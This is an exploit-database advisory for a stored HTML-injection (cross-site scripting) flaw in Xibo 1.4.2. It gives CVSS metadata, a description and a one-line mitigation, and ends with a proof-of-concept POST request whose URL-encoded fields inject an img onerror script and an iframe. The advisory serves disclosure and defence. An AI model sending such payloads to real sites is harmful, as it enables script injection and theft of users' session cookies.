Xibo HTML-injection Vulnerability

vendor:

Xibo

by:

SecurityFocus

7,5

CVSS

HIGH

HTML-injection

CWE

Product Name: Xibo

Affected Version From: Xibo 1.4.2

Affected Version To: Other versions may also be affected.

Patch Exists: YES

Related CWE: N/A

CPE: a:xibo:xibo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Xibo HTML-injection Vulnerability

Xibo is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied data does not include malicious HTML or script code.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/62063/info

Xibo is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.

Xibo 1.4.2 is vulnerable; other versions may also be affected. 

POST: /index.php?p=layout&q=add&ajax=true

Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0